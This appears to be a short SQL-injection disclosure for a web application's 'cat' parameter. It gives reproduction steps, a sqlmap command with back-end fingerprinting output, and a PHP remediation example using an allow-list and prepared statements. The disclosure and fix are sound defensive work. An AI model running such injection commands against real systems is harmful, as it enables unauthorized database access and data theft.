Description
- The application is vulnerable to error-based SQL injection.
SQL Injection
Steps to Reproduce:
- Navigate to "Builders" menu
- The URL bar shows the HTTP GET parameter "?cat=builders"
- The "cat" parameter is the injection point
- Automate the process with sqlmap
sqlmap -r request.txt --dbms=mysql -p cat
[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]
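One way to close the "cat" injection point, shown as an added example rather than the application's own code: the value is checked against an allow-list, bound as a query parameter, and database errors are logged instead of returned, since error-based injection depends on DBMS messages reaching the response. The table `listings`, the function `listingsForCategory` and the category list are hypothetical, and an in-memory SQLite database (PHP's pdo_sqlite extension) stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example: hypothetical schema and names; SQLite in memory stands in
// for the MySQL back end so the script runs without a server.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE listings (id INTEGER PRIMARY KEY, cat TEXT, title TEXT)");
$pdo->exec("INSERT INTO listings (cat, title) VALUES
            ('builders', 'Acme Construction'), ('plumbers', 'Pipe Bros')");

/**
 * Look up listings for the category taken from ?cat=...
 * Returns array(httpStatus, rows); database error text is never returned.
 */
function listingsForCategory(PDO $pdo, $cat)
{
    // Categories the menu can legitimately request (constructed list).
    $allowed = array('builders', 'plumbers');

    // 1. Allow-list: reject anything that is not a known category string.
    if (!is_string($cat) || !in_array($cat, $allowed, true)) {
        return array(400, array());
    }
    try {
        // 2. Bound parameter: the value travels as data, never as SQL text.
        $stmt = $pdo->prepare('SELECT id, title FROM listings WHERE cat = :cat');
        $stmt->execute(array(':cat' => $cat));
        return array(200, $stmt->fetchAll(PDO::FETCH_ASSOC));
    } catch (PDOException $e) {
        // 3. Keep DBMS messages out of the response: log the detail
        //    server-side and answer with a generic status.
        error_log('listings query failed: ' . $e->getMessage());
        return array(500, array());
    }
}

// Constructed inputs: a normal value, a value with a stray quote,
// an array (?cat[]=x) and a missing parameter.
$inputs = array('builders', "builders'", array('x'), null);
foreach ($inputs as $input) {
    list($status, $rows) = listingsForCategory($pdo, $input);
    printf("%-12s -> HTTP %d, %d row(s)\n", json_encode($input), $status, count($rows));
}
```

In production, `display_errors` should also be off in php.ini so that uncaught errors elsewhere in the application do not reach the page.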